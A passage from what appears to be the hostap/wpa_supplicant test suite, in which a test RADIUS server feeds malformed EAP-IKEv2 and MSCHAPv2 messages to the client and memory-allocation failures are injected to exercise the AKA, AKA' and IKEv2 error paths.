erp="1", wait_connect=False)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
params = int_eap_server_params()
params['eap_sim_db'] = "unix:/tmp/hlr_auc_gw.sock"
params['eap_sim_aka_result_ind'] = "1"
hostapd.add_ap(apdev[1]['ifname'], params)
with alloc_fail(dev[0], 1,
"eap_sim_msg_init;eap_aka_response_notification"):
dev[0].connect("test-wpa2-eap", key_mgmt="WPA-EAP", scan_freq="2412",
eap="AKA", identity="0232010000000000",
phase1="result_ind=1",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581:000000000123",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
tests = [ "eap_sim_msg_add_encr_start;eap_aka_response_notification",
"aes_128_cbc_encrypt;eap_aka_response_notification" ]
for func in tests:
with fail_test(dev[0], 1, func):
dev[0].connect("test-wpa2-eap", key_mgmt="WPA-EAP",
scan_freq="2412",
eap="AKA", identity="0232010000000000",
phase1="result_ind=1",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581:000000000123")
dev[0].request("REAUTHENTICATE")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-METHOD"], timeout=5)
if ev is None:
raise Exception("EAP method not started on reauthentication")
time.sleep(0.1)
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
tests = [ "eap_sim_parse_encr;eap_aka_process_notification_reauth" ]
for func in tests:
with alloc_fail(dev[0], 1, func):
dev[0].connect("test-wpa2-eap", key_mgmt="WPA-EAP",
scan_freq="2412",
eap="AKA", identity="0232010000000000",
phase1="result_ind=1",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581:000000000123")
dev[0].request("REAUTHENTICATE")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-METHOD"], timeout=5)
if ev is None:
raise Exception("EAP method not started on reauthentication")
time.sleep(0.1)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
def test_eap_proto_aka_prime_errors(dev, apdev):
"""EAP-AKA' protocol tests (error paths)"""
check_hlr_auc_gw_support()
params = hostapd.wpa2_eap_params(ssid="eap-test")
hapd = hostapd.add_ap(apdev[0]['ifname'], params)
with alloc_fail(dev[0], 1, "eap_aka_init"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="AKA'", identity="6555444333222111",
password="5122250214c33e723a5dd523fc145fc0:981d464c7c52eb6e5036234984ad0bcf:000000000123",
wait_connect=False)
ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="AKA'", identity="6555444333222111",
password="5122250214c33e723a5dd523fc145fc0:981d464c7c52eb6e5036234984ad0bcf:000000000123")
with fail_test(dev[0], 1, "aes_128_cbc_encrypt;eap_aka_response_reauth"):
hapd.request("EAPOL_REAUTH " + dev[0].own_addr())
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=5)
if ev is None:
raise Exception("EAP re-authentication did not start")
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="AKA'", identity="6555444333222111",
password="5122250214c33e723a5dd523fc145fc0:981d464c7c52eb6e5036234984ad0bcf:000000000123")
with alloc_fail(dev[0], 1, "eap_sim_parse_encr;eap_aka_process_reauthentication"):
hapd.request("EAPOL_REAUTH " + dev[0].own_addr())
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=5)
if ev is None:
raise Exception("EAP re-authentication did not start")
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
tests = [ (1, "eap_sim_verify_mac_sha256"),
(1, "=eap_aka_process_challenge") ]
for count, func in tests:
with alloc_fail(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="AKA'", identity="6555444333222111",
password="5122250214c33e723a5dd523fc145fc0:981d464c7c52eb6e5036234984ad0bcf:000000000123",
erp="1", wait_connect=False)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
def test_eap_proto_ikev2(dev, apdev):
"""EAP-IKEv2 protocol tests"""
check_eap_capa(dev[0], "IKEV2")
global eap_proto_ikev2_test_done
eap_proto_ikev2_test_done = False
def ikev2_handler(ctx, req):
logger.info("ikev2_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_IKEV2)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Truncated Message Length field")
return struct.pack(">BBHBB3B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 3,
EAP_TYPE_IKEV2, 0x80, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short Message Length value")
return struct.pack(">BBHBBLB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4 + 1,
EAP_TYPE_IKEV2, 0x80, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Truncated message")
return struct.pack(">BBHBBL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4,
EAP_TYPE_IKEV2, 0x80, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Truncated message(2)")
return struct.pack(">BBHBBL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4,
EAP_TYPE_IKEV2, 0x80, 0xffffffff)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Truncated message(3)")
return struct.pack(">BBHBBL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4,
EAP_TYPE_IKEV2, 0xc0, 0xffffffff)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Truncated message(4)")
return struct.pack(">BBHBBL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4,
EAP_TYPE_IKEV2, 0xc0, 10000000)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too long fragments (first fragment)")
return struct.pack(">BBHBBLB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4 + 1,
EAP_TYPE_IKEV2, 0xc0, 2, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too long fragments (second fragment)")
return struct.pack(">BBHBB2B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2,
EAP_TYPE_IKEV2, 0x00, 2, 3)
idx += 1
if ctx['num'] == idx:
logger.info("Test: No Message Length field in first fragment")
return struct.pack(">BBHBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 1,
EAP_TYPE_IKEV2, 0x40, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: ICV before keys")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_IKEV2, 0x20)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unsupported IKEv2 header version")
return struct.pack(">BBHBB2L2LBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 28,
EAP_TYPE_IKEV2, 0x00,
0, 0, 0, 0,
0, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Incorrect IKEv2 header Length")
return struct.pack(">BBHBB2L2LBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 28,
EAP_TYPE_IKEV2, 0x00,
0, 0, 0, 0,
0, 0x20, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected IKEv2 Exchange Type in SA_INIT state")
return struct.pack(">BBHBB2L2LBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 28,
EAP_TYPE_IKEV2, 0x00,
0, 0, 0, 0,
0, 0x20, 0, 0, 0, 28)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected IKEv2 Message ID in SA_INIT state")
return struct.pack(">BBHBB2L2LBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 28,
EAP_TYPE_IKEV2, 0x00,
0, 0, 0, 0,
0, 0x20, 34, 0, 1, 28)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected IKEv2 Flags value")
return struct.pack(">BBHBB2L2LBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 28,
EAP_TYPE_IKEV2, 0x00,
0, 0, 0, 0,
0, 0x20, 34, 0, 0, 28)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected IKEv2 Flags value(2)")
return struct.pack(">BBHBB2L2LBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 28,
EAP_TYPE_IKEV2, 0x00,
0, 0, 0, 0,
0, 0x20, 34, 0x20, 0, 28)
idx += 1
if ctx['num'] == idx:
logger.info("Test: No SAi1 in SA_INIT")
return struct.pack(">BBHBB2L2LBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 28,
EAP_TYPE_IKEV2, 0x00,
0, 0, 0, 0,
0, 0x20, 34, 0x08, 0, 28)
def build_ike(id, next=0, exch_type=34, flags=0x00, ike=''):
return struct.pack(">BBHBB2L2LBBBBLL", EAP_CODE_REQUEST, id,
4 + 1 + 1 + 28 + len(ike),
EAP_TYPE_IKEV2, flags,
0, 0, 0, 0,
next, 0x20, exch_type, 0x08, 0,
28 + len(ike)) + ike
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected extra data after payloads")
return build_ike(ctx['id'], ike=struct.pack(">B", 1))
idx += 1
if ctx['num'] == idx:
logger.info("Test: Truncated payload header")
return build_ike(ctx['id'], next=128, ike=struct.pack(">B", 1))
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too small payload header length")
ike = struct.pack(">BBH", 0, 0, 3)
return build_ike(ctx['id'], next=128, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too large payload header length")
ike = struct.pack(">BBH", 0, 0, 5)
return build_ike(ctx['id'], next=128, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unsupported payload (non-critical and critical)")
ike = struct.pack(">BBHBBH", 129, 0, 4, 0, 0x01, 4)
return build_ike(ctx['id'], next=128, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Certificate and empty SAi1")
ike = struct.pack(">BBHBBH", 33, 0, 4, 0, 0, 4)
return build_ike(ctx['id'], next=37, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short proposal")
ike = struct.pack(">BBHBBHBBB", 0, 0, 4 + 7,
0, 0, 7, 0, 0, 0)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too small proposal length in SAi1")
ike = struct.pack(">BBHBBHBBBB", 0, 0, 4 + 8,
0, 0, 7, 0, 0, 0, 0)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too large proposal length in SAi1")
ike = struct.pack(">BBHBBHBBBB", 0, 0, 4 + 8,
0, 0, 9, 0, 0, 0, 0)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected proposal type in SAi1")
ike = struct.pack(">BBHBBHBBBB", 0, 0, 4 + 8,
1, 0, 8, 0, 0, 0, 0)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected Protocol ID in SAi1")
ike = struct.pack(">BBHBBHBBBB", 0, 0, 4 + 8,
0, 0, 8, 0, 0, 0, 0)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected proposal number in SAi1")
ike = struct.pack(">BBHBBHBBBB", 0, 0, 4 + 8,
0, 0, 8, 0, 1, 0, 0)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Not enough room for SPI in SAi1")
ike = struct.pack(">BBHBBHBBBB", 0, 0, 4 + 8,
0, 0, 8, 1, 1, 1, 0)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected SPI in SAi1")
ike = struct.pack(">BBHBBHBBBBB", 0, 0, 4 + 9,
0, 0, 9, 1, 1, 1, 0, 1)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: No transforms in SAi1")
ike = struct.pack(">BBHBBHBBBB", 0, 0, 4 + 8,
0, 0, 8, 1, 1, 0, 0)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short transform in SAi1")
ike = struct.pack(">BBHBBHBBBB", 0, 0, 4 + 8,
0, 0, 8, 1, 1, 0, 1)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too small transform length in SAi1")
ike = struct.pack(">BBHBBHBBBBBBHBBH", 0, 0, 4 + 8 + 8,
0, 0, 8 + 8, 1, 1, 0, 1,
0, 0, 7, 0, 0, 0)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too large transform length in SAi1")
ike = struct.pack(">BBHBBHBBBBBBHBBH", 0, 0, 4 + 8 + 8,
0, 0, 8 + 8, 1, 1, 0, 1,
0, 0, 9, 0, 0, 0)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected Transform type in SAi1")
ike = struct.pack(">BBHBBHBBBBBBHBBH", 0, 0, 4 + 8 + 8,
0, 0, 8 + 8, 1, 1, 0, 1,
1, 0, 8, 0, 0, 0)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: No transform attributes in SAi1")
ike = struct.pack(">BBHBBHBBBBBBHBBH", 0, 0, 4 + 8 + 8,
0, 0, 8 + 8, 1, 1, 0, 1,
0, 0, 8, 0, 0, 0)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: No transform attr for AES and unexpected data after transforms in SAi1")
tlen1 = 8 + 3
tlen2 = 8 + 4
tlen3 = 8 + 4
tlen = tlen1 + tlen2 + tlen3
ike = struct.pack(">BBHBBHBBBBBBHBBH3BBBHBBHHHBBHBBHHHB",
0, 0, 4 + 8 + tlen + 1,
0, 0, 8 + tlen + 1, 1, 1, 0, 3,
3, 0, tlen1, 1, 0, 12, 1, 2, 3,
3, 0, tlen2, 1, 0, 12, 0, 128,
0, 0, tlen3, 1, 0, 12, 0x8000 | 14, 127,
1)
return build_ike(ctx['id'], next=33, ike=ike)
def build_sa(next=0):
tlen = 5 * 8
return struct.pack(">BBHBBHBBBBBBHBBHBBHBBHBBHBBHBBHBBHBBHBBH",
next, 0, 4 + 8 + tlen,
0, 0, 8 + tlen, 1, 1, 0, 5,
3, 0, 8, 1, 0, 3,
3, 0, 8, 2, 0, 1,
3, 0, 8, 3, 0, 1,
3, 0, 8, 4, 0, 5,
0, 0, 8, 241, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid proposal, but no KEi in SAi1")
ike = build_sa()
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Empty KEi in SAi1")
ike = build_sa(next=34) + struct.pack(">BBH", 0, 0, 4)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Mismatch in DH Group in SAi1")
ike = build_sa(next=34)
ike += struct.pack(">BBHHH", 0, 0, 4 + 4 + 96, 12345, 0)
ike += 96*'\x00'
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid DH public value length in SAi1")
ike = build_sa(next=34)
ike += struct.pack(">BBHHH", 0, 0, 4 + 4 + 96, 5, 0)
ike += 96*'\x00'
return build_ike(ctx['id'], next=33, ike=ike)
def build_ke(next=0):
ke = struct.pack(">BBHHH", next, 0, 4 + 4 + 192, 5, 0)
ke += 192*'\x00'
return ke
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid proposal and KEi, but no Ni in SAi1")
ike = build_sa(next=34)
ike += build_ke()
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short Ni in SAi1")
ike = build_sa(next=34)
ike += build_ke(next=40)
ike += struct.pack(">BBH", 0, 0, 4)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too long Ni in SAi1")
ike = build_sa(next=34)
ike += build_ke(next=40)
ike += struct.pack(">BBH", 0, 0, 4 + 257) + 257*'\x00'
return build_ike(ctx['id'], next=33, ike=ike)
def build_ni(next=0):
return struct.pack(">BBH", next, 0, 4 + 256) + 256*'\x00'
def build_sai1(id):
ike = build_sa(next=34)
ike += build_ke(next=40)
ike += build_ni()
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid proposal, KEi, and Ni in SAi1")
return build_sai1(ctx['id'])
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid proposal, KEi, and Ni in SAi1")
return build_sai1(ctx['id'])
idx += 1
if ctx['num'] == idx:
logger.info("Test: No integrity checksum")
ike = ''
return build_ike(ctx['id'], next=37, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid proposal, KEi, and Ni in SAi1")
return build_sai1(ctx['id'])
idx += 1
if ctx['num'] == idx:
logger.info("Test: Truncated integrity checksum")
return struct.pack(">BBHBB",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_IKEV2, 0x20)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid proposal, KEi, and Ni in SAi1")
return build_sai1(ctx['id'])
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid integrity checksum")
ike = ''
return build_ike(ctx['id'], next=37, flags=0x20, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("No more test responses available - test case completed")
global eap_proto_ikev2_test_done
eap_proto_ikev2_test_done = True
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_IKEV2)
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
srv = start_radius_server(ikev2_handler)
try:
hapd = start_ap(apdev[0]['ifname'])
i = 0
while not eap_proto_ikev2_test_done:
i += 1
logger.info("Running connection iteration %d" % i)
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="IKEV2", identity="user",
password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP method start")
if i in [ 41, 46 ]:
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"],
timeout=10)
if ev is None:
raise Exception("Timeout on EAP failure")
else:
time.sleep(0.05)
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
dev[0].dump_monitor()
dev[1].dump_monitor()
dev[2].dump_monitor()
finally:
stop_radius_server(srv)
def NtPasswordHash(password):
pw = password.encode('utf_16_le')
return hashlib.new('md4', pw).digest()
def HashNtPasswordHash(password_hash):
return hashlib.new('md4', password_hash).digest()
def ChallengeHash(peer_challenge, auth_challenge, username):
data = peer_challenge + auth_challenge + username
return hashlib.sha1(data).digest()[0:8]
def GenerateAuthenticatorResponse(password, nt_response, peer_challenge,
auth_challenge, username):
magic1 = binascii.unhexlify("4D616769632073657276657220746F20636C69656E74207369676E696E6720636F6E7374616E74")
magic2 = binascii.unhexlify("50616420746F206D616B6520697420646F206D6F7265207468616E206F6E6520697465726174696F6E")
password_hash = NtPasswordHash(password)
password_hash_hash = HashNtPasswordHash(password_hash)
data = password_hash_hash + nt_response + magic1
digest = hashlib.sha1(data).digest()
challenge = ChallengeHash(peer_challenge, auth_challenge, username)
data = digest + challenge + magic2
resp = hashlib.sha1(data).digest()
return resp
def test_eap_proto_ikev2_errors(dev, apdev):
"""EAP-IKEv2 local error cases"""
check_eap_capa(dev[0], "IKEV2")
params = hostapd.wpa2_eap_params(ssid="eap-test")
hapd = hostapd.add_ap(apdev[0]['ifname'], params)
for i in range(1, 5):
with alloc_fail(dev[0], i, "eap_ikev2_init"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="IKEV2", identity="ikev2 user",
password="ike password",
wait_connect=False)
ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ (1, "ikev2_encr_encrypt"),
(1, "ikev2_encr_decrypt"),
(1, "ikev2_derive_auth_data"),
(2, "ikev2_derive_auth_data"),
(1, "=ikev2_decrypt_payload"),
(1, "ikev2_encr_decrypt;ikev2_decrypt_payload"),
(1, "ikev2_encr_encrypt;ikev2_build_encrypted"),
(1, "ikev2_derive_sk_keys"),
(2, "ikev2_derive_sk_keys"),
(3, "ikev2_derive_sk_keys"),
(4, "ikev2_derive_sk_keys"),
(5, "ikev2_derive_sk_keys"),
(6, "ikev2_derive_sk_keys"),
(7, "ikev2_derive_sk_keys"),
(8, "ikev2_derive_sk_keys"),
(1, "eap_ikev2_derive_keymat;eap_ikev2_peer_keymat"),
(1, "eap_msg_alloc;eap_ikev2_build_msg"),
(1, "eap_ikev2_getKey"),
(1, "eap_ikev2_get_emsk"),
(1, "eap_ikev2_get_session_id"),
(1, "=ikev2_derive_keys"),
(2, "=ikev2_derive_keys"),
(1, "wpabuf_alloc;ikev2_process_kei"),
(1, "=ikev2_process_idi"),
(1, "ikev2_derive_auth_data;ikev2_build_auth"),
(1, "wpabuf_alloc;ikev2_build_sa_init"),
(2, "wpabuf_alloc;ikev2_build_sa_init"),
(3, "wpabuf_alloc;ikev2_build_sa_init"),
(4, "wpabuf_alloc;ikev2_build_sa_init"),
(5, "wpabuf_alloc;ikev2_build_sa_init"),
(6, "wpabuf_alloc;ikev2_build_sa_init"),
(1, "wpabuf_alloc;ikev2_build_sa_auth"),
(2, "wpabuf_alloc;ikev2_build_sa_auth"),
(1, "ikev2_build_auth;ikev2_build_sa_auth") ]
for count, func in tests:
with alloc_fail(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="IKEV2", identity="ikev2 user",
password="ike password", erp="1", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ok = False
for j in range(10):
state = dev[0].request('GET_ALLOC_FAIL')
if state.startswith('0:'):
ok = True
break
time.sleep(0.1)
if not ok:
raise Exception("No allocation failure seen for %d:%s" % (count, func))
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ (1, "wpabuf_alloc;ikev2_build_notify"),
(2, "wpabuf_alloc;ikev2_build_notify"),
(1, "ikev2_build_encrypted;ikev2_build_notify") ]
for count, func in tests:
with alloc_fail(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="IKEV2", identity="ikev2 user",
password="wrong password", erp="1",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ok = False
for j in range(10):
state = dev[0].request('GET_ALLOC_FAIL')
if state.startswith('0:'):
ok = True
break
time.sleep(0.1)
if not ok:
raise Exception("No allocation failure seen for %d:%s" % (count, func))
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ (1, "ikev2_integ_hash"),
(1, "ikev2_integ_hash;ikev2_decrypt_payload"),
(1, "os_get_random;ikev2_build_encrypted"),
(1, "ikev2_prf_plus;ikev2_derive_sk_keys"),
(1, "eap_ikev2_derive_keymat;eap_ikev2_peer_keymat"),
(1, "os_get_random;ikev2_build_sa_init"),
(2, "os_get_random;ikev2_build_sa_init"),
(1, "ikev2_integ_hash;eap_ikev2_validate_icv"),
(1, "hmac_sha1_vector;?ikev2_prf_hash;ikev2_derive_keys"),
(1, "hmac_sha1_vector;?ikev2_prf_hash;ikev2_derive_auth_data"),
(2, "hmac_sha1_vector;?ikev2_prf_hash;ikev2_derive_auth_data"),
(3, "hmac_sha1_vector;?ikev2_prf_hash;ikev2_derive_auth_data") ]
for count, func in tests:
with fail_test(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="IKEV2", identity="ikev2 user",
password="ike password", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ok = False
for j in range(10):
state = dev[0].request('GET_FAIL')
if state.startswith('0:'):
ok = True
break
time.sleep(0.1)
if not ok:
raise Exception("No failure seen for %d:%s" % (count, func))
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
params = { "ssid": "eap-test2", "wpa": "2", "wpa_key_mgmt": "WPA-EAP",
"rsn_pairwise": "CCMP", "ieee8021x": "1",
"eap_server": "1", "eap_user_file": "auth_serv/eap_user.conf",
"fragment_size": "50" }
hostapd.add_ap(apdev[1]['ifname'], params)
tests = [ (1, "eap_ikev2_build_frag_ack"),
(1, "wpabuf_alloc;eap_ikev2_process_fragment") ]
for count, func in tests:
with alloc_fail(dev[0], count, func):
dev[0].connect("eap-test2", key_mgmt="WPA-EAP", scan_freq="2412",
eap="IKEV2", identity="ikev2 user",
password="ike password", erp="1", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ok = False
for j in range(10):
state = dev[0].request('GET_ALLOC_FAIL')
if state.startswith('0:'):
ok = True
break
time.sleep(0.1)
if not ok:
raise Exception("No allocation failure seen for %d:%s" % (count, func))
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
def test_eap_proto_mschapv2(dev, apdev):
"""EAP-MSCHAPv2 protocol tests"""
check_eap_capa(dev[0], "MSCHAPV2")
def mschapv2_handler(ctx, req):
logger.info("mschapv2_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_MSCHAPV2)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unknown MSCHAPv2 op_code")
return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + 1,
EAP_TYPE_MSCHAPV2,
0, 0, 5, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid ms_len and unknown MSCHAPv2 op_code")
return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + 1,
EAP_TYPE_MSCHAPV2,
255, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Success before challenge")
return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + 1,
EAP_TYPE_MSCHAPV2,
3, 0, 5, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Failure before challenge - required challenge field not present")
return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + 1,
EAP_TYPE_MSCHAPV2,
4, 0, 5, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Failure before challenge - invalid failure challenge len")
payload = 'C=12'
return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + len(payload),
EAP_TYPE_MSCHAPV2,
4, 0, 4 + len(payload)) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Failure before challenge - invalid failure challenge len")
payload = 'C=12 V=3'
